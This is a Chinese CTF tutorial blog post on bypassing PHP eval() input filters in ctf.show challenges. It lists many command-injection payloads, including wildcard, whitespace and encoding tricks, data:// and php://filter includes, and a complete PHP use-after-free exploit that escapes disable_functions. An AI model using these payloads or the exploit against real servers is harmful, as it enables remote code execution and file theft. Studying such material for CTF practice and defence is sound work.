CTF命令执行

阅读量：3961 次

发布时间：2019-05-24

本文共 9014 字，大约阅读时间需要 30 分钟。

文章目录

本文以ctf.show网站题目为例，总结ctf中的命令执行姿势

通配符

if(!preg_match("/flag/i", $c)){
           eval($c);    }

*

c=system('cat *.php');c=system('cat f*');

?

c=system('cat fla?????');c=system('cat f?????hp');

[]

glob支持利用[0-9]来表示一个范围。
glob支持用[^x]的方法来构造“这个位置不是字符x”
我们可以利用[@-[]来表示大写字母

常用命令

system()passthru()exec()shell_exec()popen()proc_open()pcntl_exec()反引号 同shell_exec()

cat被过滤

more:一页一页的显示档案内容less:与 more 类似 head:查看头几行tac:从最后一行开始显示，可以看出 tac 是cat 的反向显示tail:查看尾几行nl：显示的时候，顺便输出行号od:以二进制的方式读取档案内容vi:一种编辑器，这个也可以查看vim:一种编辑器，这个也可以查看sort:可以查看uniq:可以查看 file -f:报错出具体内容 grep:在当前目录中，查找后缀有 file 字样的文件中包含 test 字符串的文件，并打印出该字符串的行。此时，可以使用如下命令： grep test *file strings

目录扫描

c=print_r(scandir("/"));c=var_dump(scandir('/'));c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){
   echo($f->__toString().' ');}exit(0);

exit截断

$c= $_POST['c'];        eval($c);        $s = ob_get_contents();        ob_end_clean();

$s = ob_get_contents();//得到缓冲区的数据。

ob_end_clean();//会清除缓冲区的内容，并将缓冲区关闭，但不会输出内容。

可以利用exit();停止后面的程序

payload：

c=require("/flag.txt");exit();

空格被过滤

c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));c=show_source(next(array_reverse(scandir(pos(localeconv())))));array_pop	弹出数组的值array_reverse	返回单元顺序相反的数组current和pos均可返回数组中的当前单元

c=echo`strings%09f*`;c=echo`strings\$IFS\$9f*`必须加转义字符

$IFS$IFS$1${IFS}$IFS$9<     比如cat
   
    {
   cat,flag.php}  //用逗号实现了空格功能，需要用{
   }括起来%20%09

短标签

==>

;号绕过

include不用括号，分号可以用?>代替。

c=include("/flag.txt");

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php//require//require_oncec=include$_GET[1]?>&1=data://text/plain,
   c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

命令拼接

a=whob=ami$a$b //输出whoami

1>/dev/null 2>&1绕过

1>/dev/null 2>&1的含义

代表重定向到哪里，例如：echo “123” > /home/123.txt
1 表示stdout标准输出，系统默认值是1，所以">/dev/null"等同于"1>/dev/null"
2 表示stderr标准错误
& 表示等同于的意思，2>&1，表示2的输出重定向等同于1

system($c." >/dev/null 2>&1");

1>/dev/null 首先表示标准输出重定向到空设备文件，也就是不输出任何信息到终端，说白了就是不显示任何信息。
2>&1 接着，标准错误输出重定向等同于标准输出，因为之前标准输出已经重定向到了空设备文件，所以标准错误输出也重定向到空设备文件。

我们要让命令回显，那么进行命令分隔即可

; //分号

| //只执行后面那条命令

|| //只执行前面那条命令

& //两条命令都会执行

&& //两条命令都会执行

%0a //换行

无字母/bin

https://www.cnblogs.com/NPFS/p/13797436.html

if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\

bin目录:

bin为binary的简写主要放置一些系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等

这里我们可以利用 base64 中的64 进行通配符匹配即 /bin/base64 flag.php

c=/???/????64%20????.???

看了羽大佬的WP还有一种解法

如下：payload：?c=/???/???/???2 ???.??? —》然后在url + /flag.php.bz2

/usr/bin目录:

主要放置一些应用软件工具的必备执行档例如c++、g++、gcc、chdrv、diff、dig、du、eject、elm、free、gnome、 zip、htpasswd、kfm、ktop、last、less、locale、m4、make、man、mcopy、ncftp、 newaliases、nslookup passwd、quota、smb、wget等。

我们可以利用/usr/bin下的bzip2

意思就是说我们先将flag.php文件进行压缩，然后再将其下载

无字母数字

https://blog.csdn.net/qq_46091464/article/details/108513145

https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html

我们可以通过post一个文件(文件里面的sh命令)，在上传的过程中，通过.(点)去执行执行这个文件。(形成了条件竞争)。一般来说这个文件在linux下面保存在/tmp/php???一般后面的6个字符是随机生成的有大小写。（可以通过linux的匹配符去匹配）
注意：通过.去执行sh命令不需要有执行权限

在这里插入图片描述

用$()表示数字

在这里插入图片描述

UAF脚本

https://blog.csdn.net/qq_46091464/article/details/108670155

c=function ctfshow($cmd) {
       global $abc, $helper, $backtrace;    class Vuln {
           public $a;        public function __destruct() {
                global $backtrace;             unset($this->a);            $backtrace = (new Exception)->getTrace();            if(!isset($backtrace[1]['args'])) {
                   $backtrace = debug_backtrace();            }        }    }    class Helper {
           public $a, $b, $c, $d;    }    function str2ptr(&$str, $p = 0, $s = 8) {
           $address = 0;        for($j = $s-1; $j >= 0; $j--) {
               $address <<= 8;            $address |= ord($str[$p+$j]);        }        return $address;    }    function ptr2str($ptr, $m = 8) {
           $out = "";        for ($i=0; $i < $m; $i++) {
               $out .= sprintf("%c",($ptr & 0xff));            $ptr >>= 8;        }        return $out;    }    function write(&$str, $p, $v, $n = 8) {
           $i = 0;        for($i = 0; $i < $n; $i++) {
               $str[$p + $i] = sprintf("%c",($v & 0xff));            $v >>= 8;        }    }    function leak($addr, $p = 0, $s = 8) {
           global $abc, $helper;        write($abc, 0x68, $addr + $p - 0x10);        $leak = strlen($helper->a);        if($s != 8) {
    $leak %= 2 << ($s * 8) - 1; }        return $leak;    }    function parse_elf($base) {
           $e_type = leak($base, 0x10, 2);        $e_phoff = leak($base, 0x20);        $e_phentsize = leak($base, 0x36, 2);        $e_phnum = leak($base, 0x38, 2);        for($i = 0; $i < $e_phnum; $i++) {
               $header = $base + $e_phoff + $i * $e_phentsize;            $p_type  = leak($header, 0, 4);            $p_flags = leak($header, 4, 4);            $p_vaddr = leak($header, 0x10);            $p_memsz = leak($header, 0x28);            if($p_type == 1 && $p_flags == 6) {
                    $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;                $data_size = $p_memsz;            } else if($p_type == 1 && $p_flags == 5) {
                    $text_size = $p_memsz;            }        }        if(!$data_addr || !$text_size || !$data_size)            return false;        return [$data_addr, $text_size, $data_size];    }    function get_basic_funcs($base, $elf) {
           list($data_addr, $text_size, $data_size) = $elf;        for($i = 0; $i < $data_size / 8; $i++) {
               $leak = leak($data_addr, $i * 8);            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                   $deref = leak($leak);                                if($deref != 0x746e6174736e6f63)                    continue;            } else continue;            $leak = leak($data_addr, ($i + 4) * 8);            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                   $deref = leak($leak);                                if($deref != 0x786568326e6962)                    continue;            } else continue;            return $data_addr + $i * 8;        }    }    function get_binary_base($binary_leak) {
           $base = 0;        $start = $binary_leak & 0xfffffffffffff000;        for($i = 0; $i < 0x1000; $i++) {
               $addr = $start - 0x1000 * $i;            $leak = leak($addr, 0, 7);            if($leak == 0x10102464c457f) {
                   return $addr;            }        }    }    function get_system($basic_funcs) {
           $addr = $basic_funcs;        do {
               $f_entry = leak($addr);            $f_name = leak($f_entry, 0, 6);            if($f_name == 0x6d6574737973) {
                   return leak($addr + 8);            }            $addr += 0x20;        } while($f_entry != 0);        return false;    }    function trigger_uaf($arg) {
           $arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');        $vuln = new Vuln();        $vuln->a = $arg;    }    if(stristr(PHP_OS, 'WIN')) {
           die('This PoC is for *nix systems only.');    }    $n_alloc = 10;     $contiguous = [];    for($i = 0; $i < $n_alloc; $i++)        $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');    trigger_uaf('x');    $abc = $backtrace[1]['args'][0];    $helper = new Helper;    $helper->b = function ($x) {
    };    if(strlen($abc) == 79 || strlen($abc) == 0) {
           die("UAF failed");    }    $closure_handlers = str2ptr($abc, 0);    $php_heap = str2ptr($abc, 0x58);    $abc_addr = $php_heap - 0xc8;    write($abc, 0x60, 2);    write($abc, 0x70, 6);    write($abc, 0x10, $abc_addr + 0x60);    write($abc, 0x18, 0xa);    $closure_obj = str2ptr($abc, 0x20);    $binary_leak = leak($closure_handlers, 8);    if(!($base = get_binary_base($binary_leak))) {
           die("Couldn't determine binary base address");    }    if(!($elf = parse_elf($base))) {
           die("Couldn't parse ELF header");    }    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
           die("Couldn't get basic_functions address");    }    if(!($zif_system = get_system($basic_funcs))) {
           die("Couldn't get zif_system address");    }    $fake_obj_offset = 0xd0;    for($i = 0; $i < 0x110; $i += 8) {
           write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));    }    write($abc, 0x20, $abc_addr + $fake_obj_offset);    write($abc, 0xd0 + 0x38, 1, 4);     write($abc, 0xd0 + 0x68, $zif_system);     ($helper->b)($cmd);    exit();}ctfshow("cat /flag0.txt");ob_end_flush();#需要通过url编码哦

其他姿势

c=echo `nl fl''ag.p''hp`c=echo `nl fla?????`;c=echo `nl fl\ag.php`;//转义字符绕过c=echo(`nl%09fl[abc]*`);c=eval($_GET[1]);&1=system('nl flag.php');c="\x73\x79\x73\x74\x65\x6d"("nl%09fl[a]*");等价于system()

c=echo "1";?>ctf 
   ctf

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===>

c=echo highlight_file('flag.php');c=show_source("flag.php");c=highlight_file("flag.php");c=file_get_contents("flag.php");

你可能感兴趣的文章

中国最美情诗100句

查看>>

javascript注册window的onload事件问题研究

查看>>

客户端技术分页控件javascript+css，可用于任何服务器端技术

查看>>

学习Swing 的网站[转]

查看>>

Google App engine 的第一个应用 midispot

查看>>

提问的智慧

查看>>

关于dom4j无法解析xmlns问题及生成非UTF-8字符集乱码问题的解决

查看>>

很好的一篇文章如果让我重做一次研究生王汎森

查看>>

保护U盘批处理文件

查看>>

hibernate 自动导入sql 文件import.sql 国际化编码的问题的解决方案

[Linux] 常用 linux 系统命令及维护备忘

查看>>

[Linux] 关于 Ext4 HowTo

查看>>

[杂记] 新年物语&关于Mysql引擎性能测试

查看>>

[心得] 近期更新&关于Infobright

查看>>

[杂记] 流量统计 & 短信接口

查看>>

[中间件] 消息处理利器 ActiveMQ 的介绍 & Stomp 协议的使用

查看>>

[设计] 原型界面设计利器 Balsamiq Mockups 推荐

查看>>